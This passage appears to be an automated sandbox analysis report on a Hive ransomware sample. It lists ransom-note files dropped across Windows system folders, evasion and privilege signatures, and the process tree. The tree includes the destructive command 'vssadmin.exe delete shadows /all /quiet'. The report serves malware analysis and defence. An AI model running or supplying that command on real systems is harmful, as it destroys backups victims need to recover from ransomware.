File created C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Utilities.Resources\2.0.0.0_ja_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-payments_31bf3856ad364e35_10.0.19041.746_none_3c6d03c57404e0f9\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-directui.resources_31bf3856ad364e35_10.0.19041.1023_pt-br_e4a05bc207bb3d6f\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-mediaplayer-wmvcore_31bf3856ad364e35_10.0.19041.1202_none_1fd41533d2b067a4\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-b..2provider.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_02970791e1e5a4d5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..airingdll.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_a49ef473cdccb95c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-m..dac-rds-persist-dll_31bf3856ad364e35_10.0.19041.1_none_4a9e393bc6b3251b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-ie-f12app_31bf3856ad364e35_11.0.19041.746_none_3439cbf8eff84ce1\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_dual_input.inf_31bf3856ad364e35_10.0.19041.868_none_06aed3f048cb8494\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-devicepropertymanager_31bf3856ad364e35_10.0.19041.746_none_9ae154761e6a5add\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition.Registration.resources\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-powercpl_31bf3856ad364e35_10.0.19041.423_none_3fecd70fd2fa0d37\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-wmi-filter.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_1b28da3746b5dd0d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-r..systemmanufacturers_31bf3856ad364e35_10.0.19041.746_none_4d8cd7989326ef85\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.19041.264_none_31474dbf12ce5adc\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-api_31bf3856ad364e35_10.0.19041.1266_none_2b4b7ff44edc4a8b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\INF\BITS\0411\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\INF\Windows Workflow Foundation 3.0.0.0\0409\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands.Resources\v4.0_10.0.0.0_ja_31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-aero.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_92ba62f3ec5ae25c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-wpd-busenumservice_31bf3856ad364e35_10.0.19041.1_none_2def3dd96b5fea95\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition.Registration.resources\v4.0_4.0.0.0_it_b77a5c561934e089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-a..lity-eoaexperiences_31bf3856ad364e35_10.0.19041.153_none_c283d2cf01b0b7d8\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-kernelbase_31bf3856ad364e35_10.0.19041.1288_none_a61ec92f9e248eae\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-wmpnss-publicapi_31bf3856ad364e35_10.0.19041.746_none_69467668c56fda1a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.19041.789_none_3136b8d712da0334\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..nter-core.resources_31bf3856ad364e35_10.0.19041.1_it-it_bb104a70cd466cf6\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..ransformers-onecore_31bf3856ad364e35_10.0.19041.262_none_023656085a635caf\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-t..-inputdll.resources_31bf3856ad364e35_10.0.19041.1_es-es_34064879a57dffb3\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-t..k-softkbd.resources_31bf3856ad364e35_10.0.19041.1_de-de_308c961abd2def42\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-flacencoder_31bf3856ad364e35_10.0.19041.746_none_fcdcc022ec231bfa\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.InteropServices.WindowsRuntime\v4.0_4.0.0.0__b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-driverquery.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_5586251554a4ddb1\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-u..dem-voice.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_50c12c5e7b6751b7\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2539840389-1261165778-1087677076-1000\{3DE2B3E7-739B-41F5-8C14-BBC5AECCDC21} N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\MuiCache N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow


Suspicious use of SendNotifyMessage


Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4004 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 4004 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3700 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1860 wrote to memory of 976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3700 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 4444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 2160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 3944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 2108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 1804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 3988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 4736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 4760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 4660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3700 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

